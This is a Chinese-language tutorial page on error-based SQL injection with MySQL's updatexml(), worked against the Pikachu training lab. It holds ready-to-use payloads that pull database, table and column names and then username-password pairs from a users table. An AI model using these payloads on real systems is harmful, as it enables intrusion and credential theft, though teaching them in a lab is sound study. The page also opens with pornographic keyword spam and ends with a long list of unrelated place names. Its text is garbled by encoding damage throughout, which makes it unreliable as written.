最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

詳解SQL報錯盲注

 更新時間:2022年07月22日 14:40:44   作者:永遠是少年啊  
這篇文章主要介紹了SQL報錯盲注詳解,包括SQL報錯函數(shù),SQL報錯盲注payload構造,本文通過實例代碼給大家介紹的非常詳細,對大家的學習或工作具有一定的參考借鑒價值,需要的朋友可以參考下

今天繼續(xù)給大家介紹Linux運維相關知識,本文主要內(nèi)容是SQL報錯盲注詳解。

免責聲明:
本文所介紹的內(nèi)容僅做學習交流使用,嚴禁利用文中技術進行非法行為,否則造成一切嚴重后果自負!
再次強調(diào):嚴禁對未授權設備進行滲透測試!

一、SQL報錯函數(shù)詳解

updatexml();floor();extractvalue();等函數(shù)都可以用于構造SQL報錯函數(shù),今天我們主要來講解使用updatexml()函數(shù)。
updatexml()函數(shù)使用格式如下:

updatexml(XML_document,XPath_string,new_value)

XML_document是String格式的XML文檔名稱,XPath_string是XPath格式的字符串,new_value是String格式的而字符串,用于替換查找到的符合條件的數(shù)據(jù)。
該函數(shù)有一個特性,即如果XPath_string不是XPath格式的字符串,就會報錯并顯示處XPath的值,因此,我們可以利用這一特性實現(xiàn)SQL報錯盲注。此外,我們還可以利用updatexml()函數(shù)的特性,實現(xiàn)在SQL插入、刪除等語句中的SQL注入。

二、SQL報錯盲注payload構造

1、updatexml語句構造思路

updatexml()函數(shù)的構造,首先需要閉合SQL語句中的冒號、括號。其次還需要使用and或者or語句連接成一個單獨的語句,這樣即可成功執(zhí)行updatexml()函數(shù)中的語句。
下面,我以皮卡丘靶場為例,來簡單介紹一下updatexml報錯注入payload的構造思路,皮卡丘靶場SQL insert/update型注入頁面如下所示:

在這里插入圖片描述

從上圖中可以看出,該頁面功能上是提供人員的注冊,因此可以猜測其內(nèi)部是insert類型的SQL語句,因此我們可以在手機、住址等列(一般不要選擇密碼,因為很多網(wǎng)站都會把密碼進行md5處理,從而導致我們的updatexml失效)中插入我們的updatexml語句。通過簡單的實驗可以得知,該站點的注入閉合為單引號,因此payload的構造格式為:

12' or updatexml() or'

2、查詢當前數(shù)據(jù)庫

當我們確定updatexml()函數(shù)的格式后,我們就可以寫實際的payload語句了,相關命令如下所示:

12'or updatexml(1,concat(0x7e,database(),0x7e),0) or'

從上payload可以看出,updatexml()函數(shù)有三部分組成,我們需要把我們要執(zhí)行的SQL語句寫到第二部分,第二部分是一個concat()函數(shù),之所以要拼接0x7e是因為該16進制字符是一個波浪線,也可以換成其他的字符。
該payload執(zhí)行結果如下所示:

在這里插入圖片描述

從上圖可以看出,我們當前的數(shù)據(jù)庫名為pikachu。

3、查詢表名

查詢表名的payload如下所示:

12' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),0) or '

在上述payload中,concat中間的SQL語句要用括號括起來,然后寫入正常的查詢命令即可,該payload執(zhí)行結果如下所示:

在這里插入圖片描述

從上圖可以看出,我們查詢到當前數(shù)據(jù)庫存在一個名為httpinfo的表,如果我們更改limit的限制,那么我們可以得到更多的表。

4、查詢列名

查詢列名的payload如下所示:

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),0) or '

該payload構造原理與以上類似,執(zhí)行結果如下所示:

在這里插入圖片描述

5、查詢字段名

字段名查詢的payload如下所示:

12' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='pikachu'),0x7e),0) or '

該payload構造原理與以上類似,執(zhí)行結果如下所示:

在這里插入圖片描述

6、查詢數(shù)據(jù)

數(shù)據(jù)查詢的payload如下所示:

12' or updatexml(1,concat(0x7e,(select concat(username,'-',password) from users limit 0,1),0x7e),0) or '

該payload構造原理與以上類似,執(zhí)行結果如下所示:

在這里插入圖片描述

到此這篇關于SQL報錯盲注詳解的文章就介紹到這了,更多相關SQL報錯盲注內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關文章希望大家以后多多支持腳本之家!

相關文章

最新評論

温泉县| 东乡县| 交口县| 阆中市| 封开县| 灵璧县| 科尔| 建德市| 拉孜县| 甘孜县| 方山县| 宜章县| 霍山县| 南溪县| 繁峙县| 庐江县| 七台河市| 商丘市| 平谷区| 徐闻县| 姚安县| 永济市| 和平区| 万州区| 宜川县| 密山市| 葵青区| 东安县| 苏尼特右旗| 小金县| 太和县| 富宁县| 万山特区| 光泽县| 铁岭县| 香港| 富裕县| 屏东县| 无为县| 万年县| 防城港市|